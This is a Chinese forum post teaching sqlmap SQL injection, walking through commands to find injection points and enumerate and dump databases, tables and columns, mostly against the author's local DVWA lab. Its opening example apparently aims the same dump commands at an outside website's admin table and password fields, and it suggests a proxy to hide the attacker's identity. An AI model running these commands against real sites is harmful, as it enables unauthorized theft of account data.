马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。
您需要 登录 才可以下载或查看,没有帐号?立即注册
x
需要安装的软件 1、python2.7(需要加入到系统环境变量中)
2、sqlmap
3、本地php测试环境
4、php用来渗透测试的源码(下载地址:http://dvwa.co.uk 进入之后右上角的github下载)
sqlmap官网:http://sqlmap.org/
检查注入点sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 列数据库信息sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 --dbs 指定库名列出所有表sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 -D vhost48330 --tables 指定库名表名列出所有字段sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 -D vhost48330 -T admin --columns 指定库名表名字段dump出指定字段sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 -D vhost48330 -T admin -C ac,id,password --dump 有几个参数可能会用到,直接加在最后面就可以了,更多详细参数见官方文档: --cookie=COOKIE 在需要登录的地方,需要登录后的cookie --proxy="http://127.0.0.1:8087" 使用HTTP代理隐藏自己的身份,比如使用goagent等 --sql-query=QUERY 执行一个sql语句,不一定支持
无需安装sqlmap,只需要将它的目录加入到系统环境变量即可,因为这是python脚本,需要运行在python环境下,而sqlmap只支持python2.7的,在最新的python3.6环境中并不能运行
sqlmap是为了检测数据库漏洞而生的
基础使用:
第一种方法(将信息保存在一个文件中):sqlmap.py -r teat_sqlmap.txt
teat_sqlmap.txt中包含请求网页的头信息
右键将所有发送的头信息复制到剪切板,然后粘贴到一个txt文件中
在dos里cd进入此文件所在目录
sqlmap.py -r teat_sqlmap.txt 只能探查网站服务器版本和数据库版本信息
第二中方式是直接在参数里添加头信息,只需要添加cookie和网址即可(网站是我搭建的渗透测试环境)
sqlmap.py -u "http://localhost:85/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; UM_distinctid=15e5a6a13de245-0765f75d828377-50462f1d-1fa400-15e5a6a13df4df; CNZZDATA1264021086=1393266531-1504752161-http%253A%252F%252Flocalhost%253A85%252F%7C1504752161; PHPSESSID=tikr0or6s1ikfulga0e0t682q4"
结果是一样的
重头戏来了, 枚举数据库管理系统中的数据库名称(加上参数--dbs):
sqlmap.py -r teat_sqlmap.txt --dbs
去我本地数据库看一下数据库库名是否一样
库名是一样
接下来是 :-–tables 枚举的数据库中的表名称
把--dbs改成--tables即可
sqlmap.py -r teat_sqlmap.txt --tables
这里列出了所有的数据库里面的数据数据表名
----------
-–dump 转储当前数据库中的表数据
sqlmap.py -r teat_sqlmap.txt --dump
在发现有sql注入漏洞之后,就会对提交的网站进行sql注入攻击了
------
-–dump-all 转储所有的数据库表中的数据
sqlmap.py -r teat_sqlmap.txt --dump-all
会列出所有数据库中的所有数据表数据和字段内容
---------------
-D DBNAME 指定进行枚举的数据库名
------------
-T TBL 要指定操作的数据库表名称
|